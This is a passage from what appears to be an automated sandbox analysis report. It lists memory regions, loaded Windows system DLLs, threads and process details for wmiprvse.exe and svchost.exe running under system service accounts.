0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4351 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4352 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4353 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 4354 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 4355 start_va = 0x900000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 4356 start_va = 0xa10000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4357 start_va = 0xaa0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 4358 start_va = 0xbc0000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 4359 start_va = 0xc40000 end_va = 0xf0efff entry_point = 0xc40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4360 start_va = 0xf50000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 4361 start_va = 0x1030000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 4362 start_va = 0x7fefb610000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb610000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4363 start_va = 0x7fefb780000 end_va = 0x7fefb793fff entry_point = 0x7fefb780000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 4364 start_va = 0x7fefb810000 end_va = 0x7fefb836fff entry_point = 0x7fefb810000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4365 start_va = 0x7fefb8a0000 end_va = 0x7fefb8aefff entry_point = 0x7fefb8a0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4366 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4367 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4368 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4369 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4370 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4371 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4372 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4373 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4374 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4375 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 309 os_tid = 0x224 Thread: id = 310 os_tid = 0xa08 Thread: id = 311 os_tid = 0x714 Thread: id = 312 os_tid = 0xab4 Thread: id = 313 os_tid = 0x93c Thread: id = 314 os_tid = 0x404 Process: id = "35" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x476b8000" os_pid = "0x9e0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x368" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4376 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4377 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4378 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4379 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4380 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4381 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4382 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4383 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4384 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4385 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4386 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4387 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 4388 start_va = 0x3f0000 end_va = 0x577fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 4389 start_va = 0x580000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 4390 start_va = 0x710000 end_va = 0x7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 4391 start_va = 0x7d0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 4392 start_va = 0x8d0000 end_va = 0xb9efff entry_point = 0x8d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4393 start_va = 0xba0000 end_va = 0xba1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 4394 start_va = 0xbb0000 end_va = 0xfa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 4395 start_va = 0xfb0000 end_va = 0xfb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 4396 start_va = 0xfc0000 end_va = 0xfc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 4397 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 4398 start_va = 0x1010000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 4399 start_va = 0x1170000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 4400 start_va = 0x1300000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4401 start_va = 0x1390000 end_va = 0x140ffff entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 4402 start_va = 0x1440000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 4403 start_va = 0x14f0000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 4404 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4405 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4406 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4407 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4408 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4409 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4410 start_va = 0xff7f0000 end_va = 0xff84efff entry_point = 0xff7f0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 4411 start_va = 0x7fef5630000 end_va = 0x7fef5645fff entry_point = 0x7fef5630000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 4412 start_va = 0x7fef5e10000 end_va = 0x7fef5e95fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 4413 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4414 start_va = 0x7fefb610000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb610000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4415 start_va = 0x7fefb780000 end_va = 0x7fefb793fff entry_point = 0x7fefb780000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 4416 start_va = 0x7fefb810000 end_va = 0x7fefb836fff entry_point = 0x7fefb810000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4417 start_va = 0x7fefb8a0000 end_va = 0x7fefb8aefff entry_point = 0x7fefb8a0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4418 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4419 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4420 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4421 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4422 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4423 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4424 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4425 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4426 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4427 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4428 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4429 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4430 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4431 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4432 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4433 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4434 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4435 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4436 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4437 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4438 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4439 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4440 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4441 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4442 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4443 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4444 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 4445 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4446 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4447 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 4448 start_va = 0x7fef5790000 end_va = 0x7fef57b5fff entry_point = 0x7fef5790000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 4449 start_va = 0x7fef8ba0000 end_va = 0x7fef8bdbfff entry_point = 0x7fef8ba0000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Thread: id = 317 os_tid = 0x7a0 Thread: id = 318 os_tid = 0xb0c Thread: id = 319 os_tid = 0x7ac Thread: id = 320 os_tid = 0xb9c Thread: id = 321 os_tid = 0xbb4 Thread: id = 322 os_tid = 0xbd8 Thread: id = 323 os_tid = 0x9b4 Thread: id = 324 os_tid = 0x44c Process: id = "36" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x73a4d000" os_pid = "0x2cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x368" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bb8a" [0xc000000f], "LOCAL" [0x7] Region: id = 4452 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4453 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4454 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4455 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4456 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4457 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4458 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4459 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4460 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 4461 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 4462 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4463 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4464 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 4465 start_va = 0x3c0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4466 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 4467 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4468 start_va = 0x400000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4469 start_va = 0x590000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 4470 start_va = 0x720000 end_va = 0x7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 4471 start_va = 0x7e0000 end_va = 0xbd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 4472 start_va = 0xbe0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 4473 start_va = 0xc00000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 4474 start_va = 0xc20000 end_va = 0xc20fff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 4475 start_va = 0xc30000 end_va = 0xc30fff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 4476 start_va = 0xc40000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 4477 start_va = 0xcc0000 end_va = 0xcc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 4478 start_va = 0xcd0000 end_va = 0xcd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 4479 start_va = 0xce0000 end_va = 0xce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 4480 start_va = 0xcf0000 end_va = 0xcf2fff entry_point = 0xcf0000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 4481 start_va = 0xd00000 end_va = 0xd01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 4482 start_va = 0xd10000 end_va = 0xd10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 4483 start_va = 0xd20000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 4484 start_va = 0xda0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 4485 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 4486 start_va = 0xee0000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 4487 start_va = 0xf60000 end_va = 0x122efff entry_point = 0xf60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4488 start_va = 0x1230000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 4489 start_va = 0x1370000 end_va = 0x1377fff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 4490 start_va = 0x13a0000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 4491 start_va = 0x1420000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 4492 start_va = 0x14f0000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 4493 start_va = 0x1580000 end_va = 0x15fffff entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 4494 start_va = 0x1620000 end_va = 0x169ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 4495 start_va = 0x16c0000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 4496 start_va = 0x1750000 end_va = 0x17cffff entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 4497 start_va = 0x17f0000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 4498 start_va = 0x1870000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 4499 start_va = 0x1970000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 4500 start_va = 0x1a00000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 4501 start_va = 0x1a90000 end_va = 0x1b0ffff entry_point = 0x0 